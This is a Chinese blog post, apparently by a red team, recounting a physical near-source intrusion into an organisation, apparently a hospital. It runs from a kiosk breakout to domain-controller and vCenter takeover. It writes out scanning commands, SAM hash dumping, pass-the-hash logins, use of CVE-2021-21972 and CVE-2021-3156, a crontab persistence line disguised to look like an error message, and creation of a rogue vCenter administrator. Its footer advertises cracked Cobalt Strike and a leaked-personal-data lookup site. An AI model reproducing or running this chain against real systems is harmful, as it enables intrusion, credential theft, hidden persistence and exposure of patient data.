前言
和同事利用周末时间对某单位做了一次攻防,主要就是采用近源攻击手法,最后也是通过该单位的一台自助机器进入内网。
获取入口点:
前期通过踩点,发现了一个大厅的挂号机器:
这里点击空白处进行输入,可以调动 windows 键盘:
通过操作弹出文件管理器
由于该主机不出网,直接查看他的网络适配器:
我们到找到了一个可以插网线的接口,然后插上接口,按照地址地址去配,内网直接通了,在夜深人静的时候直接偷家了。
信息收集
先进行网段的信息收集,利用 gogo 工具收集一下 172、192、10 段所有可达的C段:(这里我忘记截图了,就本地演示一下效果)
参考:https://chainreactors.github.io/wiki/gogo/do/#c
gogo.exe -w 172c #对172所达C段进行扫描扫描完后会在当前目录下生成一个 .dat 文件,直接解密该文件可获取C段
gogo.exe -F .dat
类似方法,收集完所有C段,fscan 直接开始扫弱口令,由于是半夜,所以直接开干,当前网络环境较好,直接 -np 扫弱口令:
fscan.exe -p service -np -hf cd.txt再开一个 fscan 扫描漏洞:
fscan.exe -pn service -hf cd.txt -nobr最终扫描结果堪忧,就扫到了几台 ssh 弱口令,还不出网,一个漏洞都没扫到
文件上传获取突破口
找到了一个 fck 编辑器界面,利用文件上传拿到了一个 webshell:
该主机权限较低且有杀软,就没想着提权,在该主机上获取到了重要数据库地址,密码:
利用账号密码横到了机台数据库和主机:
接下来就是对这几台主机横过去,由于主机有杀软,利用 impacket 执行命令时无法回显,利用 wmiexec-pro.py 成功绕过命令执行(这就是离!):
python3 wmiexec-pro.py "./administrator:xxxxx"@1.1.1.1 exec-command -shell
开启 3389 直接登录:
python3 wmiexec-pro.py "./administrator:xxxxx"@1.1.1.1 rdp -enable 
利用上面的账号密码直接横过去
在一台机器上的 radmin 找到一个重要平台机器
获取到百万数据:
接下来把这个平台的密码给 dump 出来,读取注册表,本地获取到 hash 密码:
reg save hklmsam C:hashsam.hive
reg save hklmsystem C:hashsystem.hive
# mimikatz导出hash值
lsadump::sam /system:sys.hiv /sam:sam.hiv利用该密码 hash 继续横向,也是这个密码拿下了域控:
PTH登陆域控
利用 wmiexec-pro.py 开启 rdp-pth-service:
python3 wmiexec-pro.py "./administrator"@1.1.1.1 -hashes :xxxxxxxxx rdp -enable-ram 
利用 xfreerdp 登陆:
xfreerdp /v:1.1.1.1 /u:administrator /pth:xxxxxxx /sound
发现报错,加条参数就解决了:
xfreerdp /v:1.1.1.1 /u:administrator /pth:xxxxxxxx /sound /tls-seclevel:0 /timeout:80000
成功登陆域控,获取域控 dns 记录,发现存在着大量 his 服务器和 emr 服务器:
继续渗透拿下vcenter
发现一个 vcenter 界面。利用 CVE-2021-21972 文件上传获取到一个低权限 webshell :
利用
https://github.com/worawit/CVE-2021-3156/blob/main/exploit_userspec.py
创建一个 gg/gg 用户,获取到 root 权限:
做了一个计划任务做个权限维持:
(crontab -l;printf "*/1 * * * * /bin/bash /tmp/1.sh;/bin/bash --noprofile -i;rno crontab for `whoami`%100cn")|crontab -后面我选择的是创建一个管理员用户来接管 vcenter:
https://github.com/3gstudent/Homework-of-Python/blob/master/vCenterLDAP_Manage.py
这里借助一下网上截图:
python vCenterLDAP_Manage.py adduser例如增加一个 [email protected] 的用户,username 就是用户名随便填,dn 这里需要把第一个 CN 改成前面填写的用户名,然后 DC 字段与获取到的 dcAccountDN 一致,userPrincipalName 这里就是真正的登录名,也需要与原本的保持一致,大概照着提示填写即可。
然后把用户加进管理员组
python vCenterLDAP_Manage.py addadmin这里直接输入前面加用户的那个 dn 就行
这里也是成功添加了一个管理员用户,成功登录并接管:
200 多台机器,直接起飞,最后也是 vcenter 拿下门户网站和 oa 系统
总结
这种攻击也是第一次尝试,还挺好玩的,内网渗透相对来说就比较简单,平时多积累一些工具和方法。打起来相对比较轻松一点。
关注公众号后台回复 0001 领取域渗透思维导图,0002 领取VMware 17永久激活码,0003 获取SGK地址,0004 获取在线ChatGPT地址,0005 获取 Windows10渗透集成环境,0006 获取 CobaltStrike 4.9.1破解版
加我微信好友,邀请你进交流群
往期推荐
对某金融App的加解密hook+rpc+绕过SSLPinning抓包
疑似境外黑客组织对CSDN、吾爱破解、bilibili等网站发起DDoS攻击
Fofa新产品 - 绕CDN溯源真实IP!
Cobalt Strike 4.8 正式发布上线!
团队在线Windows进程识别正式内测
突发!微信疑似存在RCE
某次以目的为导向的内网渗透-取开发源码
使用腾讯混元LLM辅助红队代码能力建设
APT29利用CVE-2023-38831攻击大使馆
微信PC客户端存在@全体逻辑错误
记一次渗透中因为JS拿下整个云
Juniper 新洞 CVE-2023-36845 浅析
记一次红队经历
资源委派 (提权/横向移动)
域渗透之NTLM Relay
COM接口学习与利用
KKCMS 1.371 代码审计
备用号,欢迎关注
原文始发于微信公众号(刨洞安全团队):某次近源攻击到内网漫游拿下域控以及Vcenter
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论